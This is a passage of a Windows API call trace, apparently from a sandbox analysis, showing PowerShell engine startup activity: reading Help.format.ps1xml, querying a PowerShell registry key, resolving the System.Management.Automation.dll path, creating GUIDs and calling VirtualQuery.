[0079.756] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.756] ReadFile (in: hFile=0x304, lpBuffer=0x3551b88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xccd78, lpOverlapped=0x0 | out: lpBuffer=0x3551b88*, lpNumberOfBytesRead=0xccd78*=0x1000, lpOverlapped=0x0) returned 1
[0079.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccac0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.784] SetErrorMode (uMode=0x1) returned 0x1
[0079.784] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccd20 | out: lpFileInformation=0xccd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
[0079.784] SetErrorMode (uMode=0x1) returned 0x1
[0079.784] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.784] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcce08 | out: phkResult=0xcce08*=0x304) returned 0x0
[0079.785] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd8c, lpData=0x0, lpcbData=0xccd88*=0x0 | out: lpType=0xccd8c*=0x1, lpData=0x0, lpcbData=0xccd88*=0x56) returned 0x0
[0079.785] CoTaskMemAlloc (cb=0x5a) returned 0x301e40
[0079.785] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xccd5c, lpData=0x301e40, lpcbData=0xccd58*=0x56 | out: lpType=0xccd5c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xccd58*=0x56) returned 0x0
[0079.785] CoTaskMemFree (pv=0x301e40)
[0079.785] RegCloseKey (hKey=0x304) returned 0x0
[0079.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcca50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcc900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
[0079.793] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x772a28a9, Data2=0xd2b, Data3=0x44f7, Data4=([0]=0xb2, [1]=0x68, [2]=0x70, [3]=0x55, [4]=0x68, [5]=0x2f, [6]=0x34, [7]=0x89))) returned 0x0
[0079.793] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xf59a76e4, Data2=0x6911, Data3=0x4228, Data4=([0]=0xbc, [1]=0xcf, [2]=0xf7, [3]=0x92, [4]=0x35, [5]=0xa2, [6]=0x1d, [7]=0x38))) returned 0x0
[0079.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.793] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.794] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.883] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0x9ba67290, Data2=0x7ad1, Data3=0x4128, Data4=([0]=0x9d, [1]=0xa1, [2]=0x7, [3]=0x40, [4]=0x22, [5]=0x87, [6]=0x34, [7]=0x6b))) returned 0x0
[0079.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbb10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.885] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.886] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.886] VirtualQuery (in: lpAddress=0xcb040, lpBuffer=0xcbf00, dwLength=0x30 | out: lpBuffer=0xcbf00*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.887] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.887] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.888] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.889] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.889] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.890] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.890] VirtualQuery (in: lpAddress=0xcb850, lpBuffer=0xcc710, dwLength=0x30 | out: lpBuffer=0xcc710*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.890] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.890] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.891] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.891] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.891] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.891] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.891] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.891] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.891] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.892] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.892] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.892] VirtualQuery (in: lpAddress=0xcb480, lpBuffer=0xcc340, dwLength=0x30 | out: lpBuffer=0xcc340*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.892] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.892] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.892] VirtualQuery (in: lpAddress=0xcb7b0, lpBuffer=0xcc670, dwLength=0x30 | out: lpBuffer=0xcc670*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.893] VirtualQuery (in: lpAddress=0xcb840, lpBuffer=0xcc700, dwLength=0x30 | out: lpBuffer=0xcc700*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
[0079.893] CoCreateGuid (in: pguid=0xcd030 | out: pguid=0xcd030*(Data1=0xf8af909c, Data2=0x635, Data3=0x42d8, Data4=([0]=0x82, [1]=0xe1, [2]=0x2c, [3]=0x3e, [4]=0xac, [5]=0xaa, [6]=0xd3, [7]=0x23))) returned 0x0
[0079.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0079.893] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
